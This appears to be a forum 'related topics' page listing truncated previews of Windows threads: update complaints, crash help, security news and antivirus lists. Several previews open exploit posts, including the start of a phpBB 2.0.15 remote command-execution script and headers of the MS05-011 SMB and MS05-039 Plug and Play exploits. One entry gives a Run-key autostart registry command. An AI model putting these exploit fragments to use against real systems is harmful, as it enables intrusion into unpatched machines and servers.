    Has microsoft delivered. (5)
    I am one guy who has always beleaved that when MS made XPsp2 they raised the standards for them
    selves. the package was just too good for their own good. When Sp3 came out I didnt hesitate to
    download it and what did I get? The first thing that i noticed was I could no longer use remote
    desktop. i'm sure this has since been rectified in RC2 but it realy turned me off. I never
    realised any gains in the SP. Still on the subject I found Adrian Kingsley-Hughes' blog titled
    ' XP SP3 performance gains - Nothing to write home about ' interesting He wrote: QU....
  5. Windows Xp Restarts When Using The Internet
    (0)
    Hi Guys, I've had a problem with my computer. I thought it restarted only when using the
    internet but I was wrong. I found out that isn't the denominator. I tried disabling the internet
    to run a virus scan and the scan can't complete as the computer restarts too often. I followed
    the following instructions to read the dmp file the restart error generates. 1) Download and
    install the http://www.microsoft.com/whdc/devtools/deb...installx86.mspx Debugging Tools from
    Microsoft 2) Locate your latest memory.dmp file- C:\WINDOWS\ Minidump\Mini081505-01.dmp or....
  6. Windows Vista Sp1 Blocks Antivirus Programs
    (5)
    Well it seems this is the first major problem for Vista SP 1 in the sense for those who have the
    following Secuirty Suites installed on your ocmputer that is running Vista. They block the
    following programs; Zone Alarm Security Suite 7.1, Trend Micro Internet Security 2008, BitDefender
    10, and the 2008 version of the Jiangmin antivirus. As for the reason why these programs don't
    work, Microsoft says "they are incompatible and so they must be block". Well not exactly like that
    but you get the point they also mention that other small programs might now work either b....
  7. Hole In Microsoft Messenger Program Requires A Immediate Update
    For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger (0)
    SOURCE Well it seems that Microsoft found a huge hole in MSN Messenger that was bad enough that
    they want people to upgrade to the current Messenger which is Live 8.1 or something like that. As
    for details on the problem they just said the following, "..which let hackers embed malicious code
    in Web chat invitations to users." and that they found this problem in "6.2, 7.0 and 7.5, as well as
    Windows Live Messenger 8.0." Although it was interesting to know that people were actually
    complaining about Live Messenger being a resource hog, well the last time I check msn w....
  8. Major Flaw In .ani File Found In Windows 98 Through Vista Creates Major Security Risk
    Vista Aint that Secure at all (9)
    I was able to browse around this and found it interesting since this vunerability is found in 4
    Microsoft Operating Sytems, Windows 2000, Windows XP, Windows Vista, Windows 2003 Server. From the
    article Microsoft stated that their is a hole in the .ani files, which happen to be related tothe
    mouse cursor, when the mouse icon changes depending on what you do. They only mention that with
    this flaw it always hackers to break into someone computer and do their thing. But in another
    article relating to this attack it was mention that in order for this to happen a user has ....
  9. Windows Vista Less Secure Than Older Versions?
    (7)
    my brother has windows vista and told me that it is safer than other versions of windows but
    according to other people they say that it has bugs and other stuff whick one of these are true?....
  10. Microsoft Rumor...
    From my Uncle. (17)
    My uncle said Microsoft are going to be sending viruses out via Windows Updates, he said if you do
    not have a genuine computer and you validate it you may get a virus. He said someone from PC World
    told him. I'm not exactly sure so don't go crazy, but just to tell you it may be true, maybe
    not.....
  11. Some New Apple Ipods Contain A Virus From Windows!
    (7)
    Here is the deal. I got this video ipod recently and it turns out that it had a worm on it. I was
    only one fo the few but it did have one. The virus is called RavMonE Virus. Here is a link to find
    out more about it. more info It doesn't affect macs only windows based computers. I plugged
    it up to the computer and my antivirus detected a worm and I was very surprised. I did some
    research and it turns out that some contracted company who builds the ipods for apple had computers
    connected to the ipods and they had been infected. These computers were windows....
  12. Windows Crashing. Can't Use Opera Or Firefox
    deleted files in temp folder (3)
    Windows has been acting strangely by now, it freezes/clogs badly, I can't use Opera, MF or
    continue my tutorials due to this problem. It gets on my nerves as I think it was MY problem because
    I deleted MOST of the files in the Temp folder. CODE (Start>Run...>%Temp%) That folder,
    most of the files were deleted by me. I consulted my friend by half-screwed MSN, he said I "effed me
    up the arse" by doing that. He recommended me backing up and formatting. I never did that before so
    I think it will be most-likely half-impossible for me. And as I don't have a ....
  13. A Very Simple Security Tip
    for Windows 2000/XP (13)
    We all know the difference between a limited user and an administrator user under Win2k/XP - you
    can't/can install major software, perform system maintainence, and other stuff. But using a
    limited user on a day-to-day basis also provides you with decent protection from a bunch of threats:
    if the malware is running under your limited-rights user, it can only do as much as you can. For
    instance, a limited rights user can't edit the HKLM hive of the Registry, so any malware running
    under the same user won't be able to touch that area. It's extremely simple t....
  14. Microsoft Windows Dhcp Client Service Remote Code Execution Vulnerability
    (1)
    What it is A exploit in the buggy OS of XP has been found, this one concering DHCP. OS effected
    Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Advanced Server SP1 Microsoft Windows
    2000 Advanced Server SP2 Microsoft Windows 2000 Advanced Server SP3 Microsoft Windows 2000 Advanced
    Server SP4 Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Datacenter Server SP1
    Microsoft Windows 2000 Datacenter Server SP2 Microsoft Windows 2000 Datacenter Server SP3 Microsoft
    Windows 2000 Datacenter Server SP4 Microsoft Windows 2000 Professional Microsof....
  15. Microsoft Warns Of Virus Entering Pcs Via Powerpoint
    (3)
    QUOTE Microsoft has alerted users of a virus that enters PCs through the PowerPoint program. The
    virus attaches itself to a contaminated presentation that when accessed installs a keylogging
    software on a computer. Users are being warned to take precautions because Microsoft patch that
    guards against the security loophole will still be tentatively released on August 8. Reports say
    the virus has infected relatively few people with the poisoned presentation. Malicious hackers used
    the bug found in PowerPoint 2000, 2002 and 2003. Security experts report that the vir....
  16. Worm Disguises As Windows Genuine Advantage
    be careful of the wgavn service ... (5)
    QUOTE IT security experts have warned of a worm that purports to be Microsoft's Windows
    Genuine Advantage (WGA) anti-piracy tool. WGA has recently been branded as 'spyware' in
    that it collects unnecessary hardware and software data from users' PCs. The Cuebot-K worm
    spreads via AOL Instant Messenger, registering itself as a new system driver service called
    'wgavn'. It carries the display name 'Windows Genuine Advantage Validation
    Notification', and runs automatically during system startup. Once in place the worm disables
    the Wi....
  17. Windows Xp Pro Exploit: Permission Setup Allows Access To Task Manager During Login
    even if permissions deny this abiltity. (1)
    A friend of mine was temporarily banned from the computers at my school a while ago after he
    accidentially found a way into Task Manager, which is disabled on our network. He has had his
    permissions restored now, but has no idea why he got banned in the first place. However, recently he
    explained what he did to me, and I tested it. I soon found out that, by accident, we had both
    discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
    to do with network permissions. Windows XP recieves the permission data from the network as soon....
  18. Top 7 Antivirus For Windows
    (13)
    This will help for those who likes to know if they are using one of the best Anti-virus programs.
    1. Platinum Internet Security 2005 2. PC-cillin Internet Security 2005 3. BitDefender Professional
    Edition 4. ZoneAlarm Internet Security Suite 5. F-Prot for Windows 6. Kaspersky Anti-Virus Personal
    7. G Data AntiVirusKit 2005 (AVK) Reference:
    http://antivirus.about.com/cs/beforeyoubuy/tp/aatpavwin.htm ....
  19. Microsoft Ships First Vista Security Patches
    yup, got that right -- VISTA (9)
    Microsoft Ships First Vista Security Patches http://www.eweek.com/article2/0,1895,1911406,00.asp
    QUOTE Microsoft Corp. has shipped the first critical security update for Windows Vista, the
    next version of its flagship operating system. Over the weekend, the company released patches for
    beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista
    Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in
    the Graphics Rendering Engine. A Microsoft spokesperson told eWEEK that the Vi....
  20. Serious Wmf Windows Exploit
    No-one is safe right now (16)
    This has blown up big time in the last 3 days: http://www.f-secure.com/weblog/ ....
  21. Firefox 1.5 Flaws
    For Microsoft User (22)
    I got this information from mailing list. yesterday I didn't know why my pc always heavy to be
    loaded. and now i got the answer read Firefox Flaws For A Simple Way. if you use Mozilla
    Firefox 1.5 as your default browser. type Ctrl+Alt+del or open Task Manager. You will see how much
    memory being used by firefox. QUOTE(www.informationweek.com) On December 8, 2005, we published
    a story that wondered: Firefox 1.5: Not Ready For Prime Time? In response, some 450 (and climbing)
    InternetWeek, InformationWeek, TechWeb Pipelines, and Scot's Newsletter readers ha....
  22. Microsoft Plugs Windows Worm Holes
    14 flaws in Windows... (3)
    http://news.zdnet.com/2100-1009_22-5893344.html?tag=nl.e589 Here is another proof that the words
    'Windows' and 'Security' simply cannot go together... And yet another good reason
    for installing and start using Linux... Cheers! KoYoda....
  23. Windows Security Scanners
    (0)
    hi all, In this topic I'm gonna start explain about windows security scanners , leave your
    comments and hope to enjoy /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' />
    :: Nsauditor Network Security Auditor Nauditor is a network security scanner that allows to audit
    and monitor network computers for possible vulnerabilities , to see all open ports and owner program
    names, including the process loaded modules, kernel objects, memory details, remote address and
    state of connections, dns name, country where from, service associated with connect....
  24. [article] Windows Syscall Shellcode
    (0)
    Hi friends, this article shows how shellcode can be written and executed on a Windows host without
    using any native API calls at all . By : Contact : Link to this article :
    http://securityfocus.com/infocus/1844 Removed personal info ....
  25. [exploit] Microsoft Server Message Block
    (SMB) Remote Exploit (MS05-011) (0)
    Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /* * Windows SMB Client
    Transaction Response Handling * * MS05-011 * CAN-2005-0045 * * This works against Win2k * *
    cybertronic gmx net * http://www.livejournal.com/users/cybertronic/ * * usage: * gcc -o mssmb_poc
    mssmb_poc.c * ./mssmb_poc * * connect via \\ip * and hit the netbios folder! * * ***STOP: 0x00000050
    (0xF115B000,0x00000001,0xFAF24690, * 0x00000000) * PAGE_FAULT_IN_NONPAGED_AREA * * The Client
    reboots immediately * * Technical Details: * ----------------- * * The driver MRXSMB.SYS is responsi....
  26. [exploit] Phpbb 2.0.15 "viewtopic.php"
    Remote PHP Code Execution Exploit (3)
    phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit #!/usr/bin/pyth0n print "\nphpBB
    2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org" print " well,
    just because there is none." import sys from urllib2 import Request, urlopen from urlparse import
    urlparse, urlunparse from urllib import quote as quote_plus INITTAG = ' ' ENDTAG = '
    ' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd
    ,'chr(%d)'%ord(cmd )) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += "printf("....
  27. [exploit] Microsoft Windows 2000 Plug And Play
    (1)
    Microsoft Windows 2000 Plug and Play Universal Remote Exploit #2 (MS05-039) /*
    HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 * * Copyright © 2005 houseofdabus. * * (MS05-039)
    Microsoft Windows Plug-and-Play Service Remote Overflow * Universal Exploit + no crash shellcode * *
    .:: ::. * * --------------------------------------------------------------------- * Description: * A
    remote code execution and local elevation of privilege * vulnerability exists in Plug and Play that
    could allow an * attacker who successfully exploited this vulnerability to take * complete con....
  28. How To Install An Application As A Service
    (6)
    simply enter in command proment : CODE reg add
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ServiceName /d
    "c:\path\to\service\file\exe" ....
  29. Microsoft Plans Free Anti-Spyware Program
    (12)
    Stepping up its fight against computer threats at the risk of alienating security businesses,
    Microsoft announced Tuesday it will give away a program to combat privacy-stealing and PC-clogging
    spyware and other virtual pests. Microsoft co-founder Bill Gates also unveiled plans to release
    antivirus tools for consumers and make a major security upgrade to its Internet Explorer Web
    browser. At the same time, he showed off new software for businesses to combat security threats.
    The moves are part of a wide-ranging effort by the world's largest software maker to impro....
  30. Rpc In Windows Xp
    System shutdown in XP (10)
    Dear Friends, I use Windows XP Pro SP1. When I connect to the Internet, a Notification box comes
    with countdown of 60 Seconds saying that "This System is shutting down. Please save the work and log
    off. Any unsaved changes will be lost. This shutdown is initiated by NT/Authority System (Remote
    procedure call has shutdown unexpectedly)". And after the countdown, the system Restarts. This
    occurs very often. First of all what is NT/Authority system?. Is this is a hacking or a virus or OS
    Problem?. I have norton antivirus 2004 and it is up to date. Is there any solution to ....


      31. Looking for microsoft, windows, plug, play, service, remote, ove
Similar
Microsoft To Provide Free Anti-virus Software
A Remote Key Loagger? - Im sitting behind you, and yet detecting keystrokes?!
Windows 7-windows Live Ties - Microsoft is at it again
Xp Sp3 - Has microsoft delivered.
Windows Xp Restarts When Using The Internet
Windows Vista Sp1 Blocks Antivirus Programs
Hole In Microsoft Messenger Program Requires A Immediate Update - For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger
Major Flaw In .ani File Found In Windows 98 Through Vista Creates Major Security Risk - Vista Aint that Secure at all
Windows Vista Less Secure Than Older Versions?
Microsoft Rumor... - From my Uncle.
Some New Apple Ipods Contain A Virus From Windows!
Windows Crashing. Can't Use Opera Or Firefox - deleted files in temp folder
A Very Simple Security Tip - for Windows 2000/XP
Microsoft Windows Dhcp Client Service Remote Code Execution Vulnerability
Microsoft Warns Of Virus Entering Pcs Via Powerpoint
Worm Disguises As Windows Genuine Advantage - be careful of the wgavn service ...
Windows Xp Pro Exploit: Permission Setup Allows Access To Task Manager During Login - even if permissions deny this abiltity.
Top 7 Antivirus For Windows
Microsoft Ships First Vista Security Patches - yup, got that right -- VISTA
Serious Wmf Windows Exploit - No-one is safe right now
Firefox 1.5 Flaws - For Microsoft User
Microsoft Plugs Windows Worm Holes - 14 flaws in Windows...
Windows Security Scanners
[article] Windows Syscall Shellcode
[exploit] Microsoft Server Message Block - (SMB) Remote Exploit (MS05-011)
[exploit] Phpbb 2.0.15 "viewtopic.php" - Remote PHP Code Execution Exploit
[exploit] Microsoft Windows 2000 Plug And Play
How To Install An Application As A Service
Microsoft Plans Free Anti-Spyware Program
Rpc In Windows Xp - System shutdown in XP

Searching Video's for microsoft, windows, plug, play, service, remote, ove
See Also,
advertisement


Microsoft Windows Plug-and-play Service Remote Ove

Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com